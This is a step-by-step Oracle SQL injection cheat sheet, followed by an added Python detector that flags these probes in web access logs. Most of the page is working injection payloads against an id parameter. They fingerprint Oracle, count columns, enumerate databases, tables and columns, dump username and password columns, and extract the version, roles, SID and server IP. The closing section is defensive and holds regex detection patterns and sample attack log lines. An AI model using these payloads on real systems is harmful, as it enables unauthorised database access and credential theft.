SQL Injection -- Oracle

1. Determine whether the database is Oracle

id=88 and exists(select * from dual)

id=88 and exists(select * from user_tables)   Both are Oracle system tables; if the page returns normally for these, the database is Oracle.


2. Find the number of columns

order by 4   error

order by 3   normal   so the maximum column count is 3


3. Determine the column types

id=88 union select null,null,null from dual   Checks whether any of the three columns raises a type error; if the page returns normally, continue.

id=88 and 1=2 union select 'ss',null,null from dual / null,'ss',null from dual / null,null,'ss' from dual   Whichever variant returns normally identifies that column as a character type; that column can then be used to display query results.


4. Get the names of all databases (assuming the second column is a character type)

id=88 and 1=2 union select null,(select global_name from global_name),null from dual

id=88 and 1=2 union select null,(select sys.database_name from dual),null from dual

id=88 and 1=2 union select null,(select name from v$database),null from dual   names of a few special databases

id=88 and 1=2 union select null,(select owner from all_tables where rownum=1),null from dual

id=88 and 1=2 union select null,(select owner from all_tables where owner<>'<first db name>' and rownum=1),null from dual

id=88 and 1=2 union select null,(select owner from all_tables where owner<>'<first db name>' and owner<>'<second db name>' and rownum=1),null from dual

Each query excludes the databases already found in the previous ones.


5. Get all tables in the current database

id=88 and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual

id=88 and 1=2 union select null,(select table_name from user_tables where table_name<>'<first table name>' and rownum=1),null from dual

id=88 and 1=2 union select null,(select table_name from user_tables where table_name<>'<first table name>' and table_name<>'<second table name>' and rownum=1),null from dual


6. Get a table's column names

id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='<table name>' and rownum=1),null from dual

id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='<table name>' and column_name<>'<first column name>' and rownum=1),null from dual

id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='<table name>' and column_name<>'<first column name>' and column_name<>'<second column name>' and rownum=1),null from dual


7. Query column values

id=88 and 1=2 union select null,username,password from <table name>--


8. Other useful information

null,(select banner from sys.v_$version where rownum=1)   database version

null,(select * from session_roles where rownum=1)   current user's privileges (roles)

null,(select name from v$database)   database name

null,(select table_name from user_tables where rownum=1)   all tables in the current database

null,(select member from v$logfile where rownum=1)   server operating system (inferred from the log file path)

null,(select utl_inaddr.get_host_address from dual)   IP address the server listens on

null,(select instance_name from v$instance)   database SID
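From the defender's side, the probes in steps 1 to 8 leave distinctive fingerprints in web access logs (DUAL probes, ORDER BY column counting, UNION SELECT with NULL padding, ROWNUM=1 walking, data-dictionary and V$ views, UTL_INADDR). The following detector is an added example, not code from the original page; the log lines, IP addresses and the /item?id= endpoint are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Fingerprints of the Oracle enumeration probes shown on this page: DUAL
# probes, ORDER BY column counting, UNION SELECT padding, ROWNUM=1 walking,
# data-dictionary and V$ views, and UTL_INADDR.
PATTERNS = {
    "dual_probe": r"\bfrom\s+dual\b",
    "order_by_probe": r"\border\s+by\s+\d+\b",
    "union_select": r"\bunion\s+select\b",
    "rownum_walk": r"\brownum\s*=\s*1\b",
    "dictionary_view": r"\b(user_tables|all_tables|user_tab_columns|global_name|session_roles)\b",
    "v_dollar_view": r"\bv_?\$(database|version|instance|logfile)\b",
    "utl_inaddr": r"\butl_inaddr\.get_host_address\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in PATTERNS.items()}

# Client IP and request target of a common-log-format access log line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

def classify_query(raw_query: str) -> list:
    """Names of every fingerprint found in a URL-encoded query (decoded first)."""
    decoded = unquote_plus(raw_query)
    return [name for name, rx in COMPILED.items() if rx.search(decoded)]

def scan_access_log(lines: list) -> list:
    """Return (client_ip, decoded_target, findings) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        ip, target = m.group(1), m.group(2)
        findings = classify_query(target)
        if findings:
            hits.append((ip, unquote_plus(target), findings))
    return hits

# Constructed sample log lines (not from any real system): one benign request,
# then requests mirroring steps 1, 2 and 4 of the page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item?id=88 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=88%20and%20exists(select%20*%20from%20dual) HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=88%20order%20by%204 HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=88%20and%201=2%20union%20select%20null,(select%20name%20from%20v$database),null%20from%20dual HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for ip, target, findings in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {target} -> {', '.join(findings)}")
```

A single hit such as an ORDER BY probe is weak evidence on its own; the sequence of fingerprints from one client within a short window is what distinguishes this enumeration from ordinary traffic.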

